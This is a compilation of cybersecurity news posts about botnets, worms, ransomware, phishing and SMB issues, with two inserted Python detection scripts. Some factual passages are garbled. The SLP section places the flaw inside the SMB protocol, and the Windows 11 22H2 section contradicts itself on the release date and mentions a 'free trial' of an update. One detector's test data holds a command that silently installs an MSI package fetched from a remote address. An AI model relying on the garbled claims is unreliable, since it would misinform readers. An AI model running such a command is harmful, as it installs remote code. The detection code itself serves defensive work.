Prometei Botnet: The Persistent Threat Targeting Global Systems

 

The Prometei botnet, active since at least 2016, remains a persistent worldwide threat that spreads by exploiting unpatched software vulnerabilities. First identified in 2020, Prometei has since infected over 10,000 systems across diverse regions, including Brazil, Indonesia, Turkey, and Germany. Its resilience stems from its focus on gaps in widely used software, particularly on systems with weak configurations, unmonitored security controls, or missing patches. The Federal Office for Information Security in Germany has labeled it a medium-impact threat, given its extensive reach and ability to bypass security protocols. It spreads particularly through unpatched or poorly configured Exchange servers.

Critical Start’s Callie Guenther highlights Prometei’s strategy of leveraging regions with inadequate cybersecurity, making it highly effective in targeting various systems regardless of location. One notable aspect is its ability to spread through legacy vulnerabilities, such as the BlueKeep flaw in Remote Desktop Protocol (RDP), which has a critical CVSS score of 9.8. By targeting these known issues, Prometei can quickly access poorly maintained systems that remain unprotected. A Prometei attack often starts with a series of network login attempts, typically originating from locations associated with known botnet infrastructure. Once access is secured, the malware tests various system weaknesses, particularly outdated vulnerabilities like BlueKeep and EternalBlue. If successful, it can propagate through Server Message Block (SMB) systems or use ProxyLogon flaws to exploit Windows environments further. 

Prometei’s use of outdated exploits could be seen as unsophisticated; however, its approach is strategic, focusing on identifying vulnerable, under-maintained systems rather than tackling those with robust security controls. Once established on a target system, Prometei employs several techniques to maintain control and evade detection. For example, it uses a domain generation algorithm (DGA) to make its command-and-control (C2) system resilient, allowing continuous operation even if some domains are blocked. It further manipulates firewall settings so that its traffic is not blocked, enabling it to persist even after system reboots. Among its more advanced methods is abuse of the WDigest authentication protocol, which, when enabled, keeps plaintext passwords in memory.

Prometei forces systems to store passwords in plaintext, then exfiltrates them while evading detection by configuring Windows Defender to ignore specific files. The primary goal of Prometei appears to be cryptojacking, as it harnesses infected systems to mine the Monero cryptocurrency without the owners’ knowledge. Additionally, it installs an Apache web server as a web shell, creating a backdoor through which attackers can upload more malicious files or execute commands. Prometei’s presence, according to Trend Micro’s Stephen Hilt, often signals deeper security concerns, as it can coexist with other malicious software, highlighting weaknesses that attackers may leverage for various purposes. Interestingly, Prometei avoids certain regions, specifically targeting systems outside former Soviet countries: its command-and-control infrastructure avoids exit nodes within those nations, and the malware skips accounts named “Guest” or “Other user” in Russian.

Older versions of Prometei also included Russian-language settings, hinting at a potential connection to Russian-speaking developers. The botnet’s name, “Prometei,” references the Greek titan Prometheus, symbolizing a persistence that echoes the botnet’s own sustained presence in global cyber threats. Prometei exemplifies the persistent and evolving nature of modern botnets. Its success in exploiting well-known but unpatched vulnerabilities underscores the importance of maintaining updated security systems. For organizations worldwide, especially those with legacy systems or lax monitoring, Prometei serves as a critical reminder to reinforce defenses against cyber threats, as outdated security leaves systems vulnerable to malicious actors seeking to exploit any gap available.

SMB Cyber Threats: Information-Stealing Malware, Ransomware, and BEC

 

In today's digital landscape, small and medium-sized businesses (SMBs) are increasingly becoming prime targets for cybercriminals looking to exploit vulnerabilities for financial gain. A recent report from cybersecurity firm Sophos sheds light on the top cyber threats facing SMBs, highlighting information-stealing malware, ransomware, and business email compromise (BEC) as the most prevalent dangers. 

Infostealers are malicious programs designed to clandestinely gather sensitive data and login credentials, posing significant risks to businesses that may not have robust cybersecurity measures in place. The insidious nature of infostealers lies in their ability to operate discreetly, often evading detection until substantial damage has been done.

Christopher Budd, director of Sophos X-Ops, underscores the escalating value of stolen data among cybercriminals, particularly concerning SMBs. He elucidates a hypothetical scenario where attackers exploit infostealers to compromise a business's accounting software, thereby gaining access to critical financial information and potentially siphoning funds into their own accounts. 

This underscores the dire consequences of falling victim to information-stealing malware, which can have far-reaching financial and reputational implications for SMBs. Despite the prevalence of infostealers, ransomware remains the most significant threat to SMBs' cybersecurity. While Sophos reports that the number of ransomware attacks has stabilized, the evolution of ransomware tactics continues unabated. 

One alarming trend highlighted in the report is the rise of remote encryption attacks, wherein threat actors leverage unmanaged devices within a victim organization to encrypt files on other systems. This sophisticated approach underscores the adaptability and persistence of ransomware operators in their quest to extort businesses for financial gain. 

Following closely behind ransomware, BEC attacks represent another formidable threat to SMBs. These attacks involve cybercriminals engaging in deceptive email correspondence or even phone calls with victims to gather sensitive information or manipulate them into transferring funds. The increasing sophistication of BEC tactics poses significant challenges for SMBs, as attackers leverage social engineering techniques to bypass traditional cybersecurity defenses. 

To mitigate these cyber threats effectively, SMBs must adopt a multi-faceted approach to cybersecurity. This includes implementing robust endpoint protection solutions, regularly updating software to patch known vulnerabilities, and providing comprehensive employee training on cybersecurity best practices. 

Additionally, adopting measures such as multi-factor authentication and encryption can add layers of security to sensitive data and communications, making it more challenging for cybercriminals to exploit vulnerabilities.

SMBs must remain vigilant in the face of evolving cyber threats and prioritize cybersecurity as a fundamental aspect of their business operations. By staying informed about emerging threats and investing in proactive cybersecurity measures, SMBs can fortify their defenses and safeguard their digital assets against malicious actors. With cyber threats continuing to evolve in sophistication and scale, proactive cybersecurity measures are essential for protecting the interests and integrity of SMBs in today's digital landscape.

SLP Vulnerability Exposes Devices to Powerful DDoS Attacks

Security researchers have recently discovered a new vulnerability that has the potential to launch devastating Distributed Denial of Service (DDoS) attacks. The Server Message Block (SMB) protocol, which is widely used in various devices and systems, including Windows machines and some network-attached storage devices, contains the SLP vulnerability. Attackers can exploit this vulnerability to send specially crafted SMB packets that force the target device to allocate excessive memory or processing power to the request, ultimately causing a crash or downtime.

The SLP vulnerability is particularly dangerous because it enables attackers to amplify the impact of their DDoS attacks by up to 2200 times compared with previous methods. This increased power can overwhelm the target’s defenses and cause lasting damage. Unfortunately, there is no straightforward fix for this vulnerability, as it is deeply embedded in the SMB protocol and affects many devices and systems. However, organizations can take steps to mitigate the risk of attack, such as implementing access controls and firewalls and monitoring their networks for any suspicious SMB activity.

The discovery of the SLP vulnerability highlights the need for robust cybersecurity measures and constant vigilance against evolving threats. As attackers develop new tactics and exploit new vulnerabilities, organizations must stay ahead of the curve and protect their networks and systems from harm.

The SLP vulnerability is a significant concern for organizations that use the SMB protocol, as it exposes them to potential DDoS attacks. The impact of these attacks can be devastating and long-lasting, highlighting the need for constant vigilance and strong cybersecurity measures. Organizations must take proactive steps to monitor their networks, implement access controls, and limit the exposure of SMB services to the internet to mitigate the risk of attack. The discovery of the SLP vulnerability underscores the critical importance of staying ahead of the curve in cybersecurity and constantly adapting to new threats.

Ransomware Attacks on the Small and Medium Businesses are on the Rise

 

The risk of being victimised by ransomware has grown over time. The frequency and sophistication of these attacks, which affect every industry, have both steadily increased. Additionally, as these attacks become more widely known among businesses, they search for fresh defenses against them.

According to a survey by Checkpoint, 61 percent of all cyberattacks targeted small firms. The report also notes that few small and medium-sized enterprises (SMBs) are aware that they are vulnerable to these internet risks just like larger corporations. SMEs can strengthen their internet security by following the three steps Checkpoint has provided.

Maintain IT equipment and make routine repairs

Keeping your systems updated with the most recent software and security updates can prove to be extremely beneficial when it comes to safeguarding your organisation against any cyber-attacks. 

According to a recent report, 80% of all BYODs (bring your own devices) at a firm are not monitored, which presents a chance for hackers to exploit these unattended systems. Updates for tablets, smartphones, laptops, and PCs used for office work should be installed as soon as they are made available. This is one of the most crucial steps you can take to increase security. By ensuring that their operating systems, software, phones, and apps are set to update automatically, users can also prevent gaps in their security posture. 

Monitor the usage of hard drives and USB sticks

For at least part of the week, 40% of SMB employees must work remotely. The security of these devices must be managed properly at all times, and that is the company's top responsibility. Workers frequently transfer files between teams or to other businesses using an external USB drive or memory stick.

The fact that one unsecured device is all it takes to compromise an entire network should not be overlooked. It is exceedingly challenging to trace files stored on removable devices because those devices are shared so widely. The likelihood of a breach can be reduced by using endpoint protection measures, restricting access to physical ports, and only permitting the use of authorised sticks or memory cards.

Avoid backing up data on the main server 

If you keep all of your company's data on the same server, there is a risk that an attacker may access all of it in the event of a breach. Organizations should identify the critical information necessary for their operations and establish an entirely separate, off-site network backup. Employees will still be able to access crucial files and carry on with daily operations, and this will help the company recover from a ransomware attack.

Emails are Vulnerable to Cyber Threat

Small businesses and organizations of various sizes worldwide rushed to apply patches and assess what had been compromised. The hacks expose the vulnerability of the 32 million small businesses that are largely unable to afford working with cybersecurity firms and primarily rely on the built-in security measures of their software and hardware providers.

According to Iram, a former Israeli intelligence officer, large tech firms can harden their systems before release in order to block hackers before they impact small and medium-sized firms. He adds that cybercrime fell each time major software companies changed default settings or shipped other general updates with cybersecurity in mind.

According to market research company Gartner, Microsoft has more than 86% of the enterprise email processing market, whereas Google has just under 13%.

Challenges with email 

The root of many of today's problems is that several components of the technology stack were created before cybercriminals became a concern. The big firms that dominate the industry still have not added security as a default feature of basic software, leaving it to the cybersecurity market to do so. This has led to explosive growth in a new category of companies.

Microsoft Defender for Office 365 finds and stops thousands of user compromise actions each month in addition to nearly 40 million emails with Business Email Compromise, or BEC, and 100 million emails with harmful credential phishing links.

Some cybersecurity enterprises with a focus on the small business sector have launched in the last three to five years, such as Huntress and SolCyber. Even the slightest flaws in one organization, in a highly networked society, can spread to another. An NPR investigation into the significant Microsoft Exchange data breach came to the conclusion that Chinese hackers were targeting American businesses in an effort to collect consumer data on Americans for an unidentified reason.

The American government has so far adopted a conservative stance; a representative for the U.S. Cybersecurity Infrastructure Agency claimed that the agency does not regulate software for small businesses.


Performance Hit Experienced By File Copying Due to Windows 11 22H2

 


According to reports, Microsoft began rolling out Windows 11 version 22H2 last month, just a few months after announcing it. The experience has not been as smooth as one might expect.

"22H2 has a performance problem when copying large files from a remote computer to a Windows 11 computer or when copying files on a local drive," explains Ned Pyle, Principal Program Manager at Windows Server engineering.

There have been several reports of users reporting that the update failed with an error code of "0x800f0806". Interestingly enough, one of our Neowin members was able to figure out a workaround for this problem. There are also the usual suspects, like printer problems as a result of a revised printer policy that leads to printers not being detected after the 2022 Update, which can result in a lot of frustration. 

Another related issue caused Microsoft to block the whole update on affected devices. After discovering it, Microsoft warned IT admins that provisioning for Windows 11 22H2 is currently broken.

Additionally, the Redmond-based firm revisited another problem that was resulting in the massive slow-down in the speed at which large files could be copied remotely on 22H2 systems as a result of a power failure. 

According to the company, there have been reports of speeds around 40% lower than expected. Users are experiencing more performance issues than before, and the situation seems to be getting increasingly problematic.

Earlier this week, Microsoft released KB5017389 preview cumulative update for Windows operating systems. This update included the fixes for this issue as well as a free trial of the update for those who have not yet downloaded it. The support document provides more information regarding this issue and also offers a free trial of the release.

On Windows 11 version 22H2, copying large files of multiple gigabytes (GB) might take longer than expected to complete.

Despite the newly acknowledged issue, Microsoft added that Windows devices that are used in small or personal networks are less likely to be affected by it than those used for business networks.

A workaround is available: Microsoft has reportedly shared it with customers affected by the known issue after updating their devices to Windows 11 22H2.

Impacted users can mitigate the performance hit of file copying over SMB by using file copy tools that do not use the cache manager (buffered I/O), such as any of the freeware applications available on the Internet.

Microsoft is currently investigating the issue and working on a solution, which will be included in a future release.

It has been more than two years since Microsoft released Windows 11 22H2, and it has now added compatibility holds so that the upgrade is no longer offered on some systems, due to printer problems or blue screens.

As part of this week's announcement, Microsoft confirmed that the Windows 11 2022 Update is also causing provisioning issues, leaving Windows 11 endpoints only partially configured and unable to complete the installation process.

After entering a new deployment phase on Tuesday, October 4, Windows 11 22H2 is now available to all seekers on qualifying devices, and it has been installed on some of the devices already.

Users of Intuit QuickBooks Targeted in Phishing Scams

 

Intuit, a financial software business based in the US, has issued a warning to its clients about a new QuickBooks phishing campaign. The current campaign, which is the company's fifth big security threat this year, involves deceiving customers into believing their account has been suspended.

"We're writing to advise you that we were unable to confirm certain information on your account after performing an assessment of your company. As a result, we've placed a temporary hold on your account." The phishing message goes as follows: "If you believe we've made a mistake, please let us know as soon as possible so we can correct it. Please fill out the verification form below to assist us with effectively revisiting your account. We will re-evaluate your account within 24-48 hours after verification is finished." 

Malicious content within the bogus Intuit support team message would send the target to a phishing website where criminals may steal personal data or install malware on the victim's device if they click the "Complete Verification" button. The sender "is not linked with Intuit, is not an authorized agent of Intuit, nor is their use of Intuit's logos permitted by Intuit," according to the accounting software company. Customers are advised not to open these phishing messages.

Small and medium-sized businesses (SMBs) all over the world utilize Intuit's QuickBooks software. According to the company's website, there are 4.5 million users globally. This year, cyber attackers have targeted the company's vast user base, particularly around tax season in the United States, when the corporation was compelled to release two separate security advisories in as many days in February. 

The email in both phishing scams pretended to be an account inactivity warning, suggesting that the user's account had been disabled due to inactivity. Victims were sent links to a bogus Intuit website, which could have been used to steal account information. 

Intuit also advises customers to delete the messages from their email inboxes to avoid personal data being stolen and a possible malware infection. Customers who opened the email, clicked a link, or downloaded a possibly harmful attachment should take the following precautions:
  • Delete the downloaded attachment right away. 
  • Passwords should be changed regularly. 
  • Run a complete scan on the machine that may have been hacked. 
  • Intuit also offers a comprehensive list of security advice that can assist customers in avoiding common cyberattacks such as phishing emails, customer service scams, and identity theft.

Indexsinas SMB Worm Attacks Vulnerable Environments

 

The Indexsinas SMB worm is targeting vulnerable environments, researchers warn, focusing on the healthcare, hospitality, education, and telecommunications industries. Its ultimate objective is to drop crypto miners on compromised machines.

Indexsinas, aka NSABuffMiner, has been lurking since 2019. It uses the Equation Group's leaked arsenal, the EternalBlue and EternalRomance exploits and the DoublePulsar backdoor, to break into Windows SMB shares. Indexsinas uses lateral movement to take over targeted environments aggressively.

“Propagation is achieved through the combination of an open-source port scanner and three Equation Group exploits – EternalBlue, DoublePulsar, and EternalRomance,” as per a Guardicore Labs analysis.

Since 2019, Indexsinas has built a broad infrastructure of over 1,300 devices operating as attack sources, each responsible for only a few attacks (most likely compromised systems, Guardicore observed, particularly in India, the USA, and Vietnam). To date, almost 2,000 different attacks have been recorded in Guardicore's telemetry.

The attackers behind Indexsinas have been difficult to unmask.

“The Indexsinas attackers are careful and calculated,” according to the firm. “The campaign has been running for years with the same command-and-control domain, hosted in South Korea. The [command-and-control] C2 server is highly protected, patched, and exposes no redundant ports to the internet. The attackers use a private mining pool for their crypto mining operations, which prevents anyone from accessing their wallets’ statistics.” 

According to Guardicore Labs, the attack commences when a machine is breached using the NSA's tools. These exploits run code in the victim's kernel and can inject payloads into user mode using asynchronous procedure calls (APCs).

Researchers noted, “Indexsinas uses the exploits to inject code to either explorer.exe or lsass.exe. The injected payloads – EternalBlue.dll for 32-bit and DoublePulsar.dll for 64-bit – download three executable files from the main C2 server.”

Among the downloaded files is a complete DLL, a Portable Executable, that is a version of the Gh0stCringe remote access tool (RAT).

The first installs the RAT, while the second handles C2 commands and reports machine information, including computer name, malware group ID, installation date, and CPU specifications.

The files iexplore.exe and services.exe meanwhile install two services, impersonating the legitimate Windows svchost.exe. The first service drops the crypto miner, whereas the second just runs the crypto miner module.

Another payload downloaded in the initial stage is c64.exe, which in turn drops two files. One is the executable ctfmon.exe, the propagation tool.

“Ctfmon.exe is responsible for finding potential victims and exploiting them using Equation Group’s tools – and it does that extremely thoroughly,” researchers said. “It uses exploits for both 32-bit and 64-bit machines and scans both RPC (TCP 139) and SMB (TCP 445) ports. Moreover, it tries to move laterally within the organizational network as well as spread across the internet.” 

A scheduled task runs a batch script that installs a service. The service launches a second batch script that scans for the ports and exploits them.

The batch scripts in these flows also remove competing miners' services, kill their processes and delete their files.

“It is crucial that network administrators, IT teams, and security personnel be able to easily identify assets and the services they run,” they explained. “Specifically, it should be easy to spot internet-facing servers, SMB included. With visibility in place, network admins would want to limit the access from and to different assets and the network services they expose.” 

Corporate functions and production activities, for example, should be separated. Policy rules can also be applied to secure an organization's SMB servers, such as blocking SMB access from the internet or only permitting specified IP addresses to reach the firm's internet-facing file server. This can help prevent Indexsinas worm infections.
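As an added example (not the original post's or Guardicore's code), here is a Python check that applies the visibility advice above to constructed connection logs: it flags hosts sweeping TCP 139/445 across many neighbours and SMB sessions reaching internal hosts from the internet. The log format, internal address ranges and thresholds are assumptions.

```python
"""Spot SMB scanning fan-out and internet-sourced SMB access in connection logs.

Added example for the Indexsinas passage: the worm scans TCP 139/445 both
laterally and across the internet, and the advice is to know which assets
expose SMB and to whom. Runs over constructed log lines in an assumed
"timestamp src dst dport action" format.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

SMB_PORTS = {139, 445}
# Assumed internal address space; adjust to the environment.
INTERNAL = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
            ip_network("192.168.0.0/16")]

# Constructed sample (not real telemetry): one host sweeping SMB ports,
# one normal client, and two external sources reaching an internal server.
SAMPLE_LOG = """\
2021-06-30T10:00:01 10.0.5.17 10.0.5.20 445 allow
2021-06-30T10:00:01 10.0.5.17 10.0.5.21 445 allow
2021-06-30T10:00:02 10.0.5.17 10.0.5.22 445 deny
2021-06-30T10:00:02 10.0.5.17 10.0.5.23 445 deny
2021-06-30T10:00:03 10.0.5.17 10.0.5.24 139 allow
2021-06-30T10:00:03 10.0.5.17 10.0.5.25 139 deny
2021-06-30T10:00:04 10.0.5.17 10.0.5.40 3389 allow
2021-06-30T10:00:10 10.0.5.18 10.0.5.30 445 allow
2021-06-30T10:00:11 10.0.5.18 10.0.5.31 445 allow
2021-06-30T10:00:20 203.0.113.45 10.0.1.5 445 allow
2021-06-30T10:00:21 198.51.100.7 10.0.1.5 445 deny
"""


def load_records(text):
    """Parse the assumed line format, skipping blank lines."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, action = line.split()
        records.append({"ts": ts, "src": ip_address(src), "dst": ip_address(dst),
                        "port": int(port), "action": action})
    return records


def is_internal(ip):
    return any(ip in net for net in INTERNAL)


def find_smb_fanout(records, threshold=5):
    """Sources that touch `threshold` or more distinct hosts on 139/445 within
    a single minute. Denied attempts count too: a scanner sweeping a subnet
    leaves closed-port noise that a legitimate client never produces."""
    seen = defaultdict(set)                      # (src, minute) -> {dst}
    for r in records:
        if r["port"] in SMB_PORTS:
            seen[(r["src"], r["ts"][:16])].add(r["dst"])
    peak = defaultdict(int)
    for (src, _minute), dsts in seen.items():
        peak[src] = max(peak[src], len(dsts))
    return {str(src): n for src, n in peak.items() if n >= threshold}


def find_internet_smb(records):
    """Allowed SMB connections from outside the internal ranges: exactly the
    exposure the guidance says to remove or restrict to known addresses."""
    hits = {(str(r["src"]), str(r["dst"]), r["port"]) for r in records
            if r["port"] in SMB_PORTS and r["action"] == "allow"
            and not is_internal(r["src"]) and is_internal(r["dst"])}
    return sorted(hits)


if __name__ == "__main__":
    recs = load_records(SAMPLE_LOG)
    print("SMB fan-out:", find_smb_fanout(recs))
    print("Internet-sourced SMB:", find_internet_smb(recs))
```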

New Worm Capabilities Targets Windows Machines

 

A malware family that has targeted exposed Windows machines through phishing and exploit kits has been retooled with new "worm" capabilities. Purple Fox, which first appeared in 2018, is an active malware campaign that until recently required user interaction or some kind of third-party tool to infect Windows machines. However, the attackers behind the campaign have now upped their game and added new functionality that can force its way into victims' systems on its own, according to new research published on Tuesday by Guardicore Labs.

“Guardicore Labs have identified a new infection vector of this malware where internet-facing Windows machines are being breached through SMB password brute force,” Guardicore Labs' Amit Serper said. In addition to these new worm abilities, Purple Fox now also includes a rootkit that allows the threat actors to hide the malware on the machine and make it hard to detect and remove, he said.

Researchers examined Purple Fox's most recent activity and discovered two major changes to how the attackers spread malware on Windows machines. The first is that the new worm payload executes after a victim machine is compromised through a vulnerable exposed service. Purple Fox also still uses an older method of infecting machines through a phishing campaign, delivering the payload by email to exploit a browser vulnerability, researchers observed. When the worm infects a victim's machine, it creates a new service to establish persistence and executes a simple command that iterates through a number of URLs hosting the MSI that installs Purple Fox on the compromised machine, said Serper.

“msiexec will be executed with the /i flag, in order to download and install the malicious MSI package from one of the hosts in the statement,” he explained. “It will also be executed with the /Q flag for ‘quiet’ execution, meaning, no user interaction will be required.”

Devices caught in this botnet include Windows Server machines running IIS version 7.5 and Microsoft FTP, and servers running Microsoft RPC, Microsoft SQL Server 2008 R2, Microsoft HTTPAPI httpd 2.0, and Microsoft Terminal Service.
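An added example (not from the post, Guardicore or Microsoft) covering the SMB password brute force described here, the series of network login attempts that opens a Prometei attack earlier on the page, and the quiet msiexec install from a URL that Serper describes: Python detection logic over constructed Windows Security-style events (4625 failed logon, 4688 process creation). Field names, thresholds and the sample addresses are assumptions.

```python
"""Flag network-logon brute force and remote quiet msiexec installs.

Added example over constructed Windows Security-style events; the dict
field names mirror 4625/4688 event fields but are an assumption, not a
real log schema. Addresses are documentation ranges, not real actors.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta


def _failed_logon(t, src, user, logon_type=3):
    """Constructed 4625 (failed logon) event. Type 3 = network logon, which
    is what SMB authentication attempts produce on the target."""
    return {"time": t, "id": 4625, "logon_type": logon_type,
            "src_ip": src, "user": user}


BASE = datetime(2021, 3, 23, 8, 0, 0)
USERS = ["administrator", "admin", "backup", "sql"]
# 12 failures in 55 seconds from one external source, cycling user names.
EVENTS = [_failed_logon(BASE + timedelta(seconds=5 * i), "198.51.100.23",
                        USERS[i % 4]) for i in range(12)]
# Three mistyped passwords from a workstation, spread over half an hour.
EVENTS += [_failed_logon(BASE + timedelta(minutes=m), "10.0.0.5", "alice")
           for m in (1, 7, 30)]
# An interactive (type 2) failure from the same external IP: not counted.
EVENTS.append(_failed_logon(BASE + timedelta(seconds=20), "198.51.100.23",
                            "bob", logon_type=2))
# Two 4688 process creations: the worm's install pattern and a local one.
EVENTS += [
    {"time": BASE + timedelta(minutes=2), "id": 4688,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://203.0.113.9/installer.moe /Q"},
    {"time": BASE + timedelta(hours=1), "id": 4688,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\installers\tool.msi" /qn'},
]


def network_logon_bruteforce(events, threshold=10, window=timedelta(minutes=2)):
    """Return {src_ip: peak} for sources whose failed network (type 3) logons
    reach `threshold` inside any sliding `window`."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e.get("logon_type") == 3:
            by_src[e["src_ip"]].append(e["time"])
    hits = {}
    for src, times in by_src.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:      # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[src] = peak
    return hits


def remote_quiet_msiexec(events):
    """Return msiexec command lines that install a package straight from an
    http(s) URL with a quiet switch (/q, /qn, /Q): the worm's pattern.
    A local .msi path with /qn is left alone."""
    found = []
    for e in events:
        if e["id"] != 4688 or not e["image"].lower().endswith("\\msiexec.exe"):
            continue
        cmd = e["cmdline"]
        if (re.search(r"(?i)\s/i\s+[\"']?https?://", cmd)
                and re.search(r"(?i)\s/q", cmd)):
            found.append(cmd)
    return found


if __name__ == "__main__":
    print("Brute force:", network_logon_bruteforce(EVENTS))
    print("Remote quiet MSI:", remote_quiet_msiexec(EVENTS))
```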

The Blue Mockingbird Malware Group Exploits Vulnerabilities in Organizations' Networks


Another notorious cryptocurrency-mining malware has surfaced which has allegedly been infecting the systems of countless organizations. The group controlling the operation goes by the code name “Blue Mockingbird”.

The researchers who discovered it have reason to believe that Blue Mockingbird has been active since the last month of 2019. According to them, it targets “public-facing servers” that run “ASP.NET” apps using the “Telerik framework” for their user interface (UI).

Reportedly, the vulnerability the hackers exploit is “CVE-2019-18935”, which is used to embed a web shell on the target’s server. Per the same report, they later employ a version of “the Juicy Potato technique” to obtain admin access and alter server settings to gain “(re)boot persistence”.

After obtaining complete access to a system, sources say, the group installs a version of XMRig, a well-known cryptocurrency-mining application, particularly for the “Monero (XMR)” cryptocurrency.

As per reports, if the public-facing IIS servers are connected to a company’s internal network, the group is likely to try to spread internally through improperly secured Server Message Block (SMB) connections or Remote Desktop Protocol (RDP).

The exact number of infections the botnet has caused isn’t clear, but estimates put the operation at 1,000 infections at the least. There also doesn’t seem to be a way to gauge the intensity of the threat.

Not many of the organizations observed by the researchers have been hit with this particular threat, and the above-mentioned number of infections surfaced over a very short tracking period.

Nevertheless, all companies are susceptible to this attack, even the ones that think they are safe, and the number of infections could be higher than estimated.

According to sources, the allegedly vulnerable Telerik UI component is part of ASP.NET applications that run on their latest versions; even then, the Telerik component itself may be an outdated version that still endangers organizations. The component could exist in applications a company uses without the company even knowing about it, leaving them exposed.

The Telerik UI CVE-2019-18935 vulnerability, per reports, is widely known as the one used to embed web shells on servers. Another report noted that this vulnerability is the most exploited and that organizations need to improve their firewalls to defend against it. If for some reason an organization does not have a web firewall, it can look for warning precursors on servers and workstations, reports cite.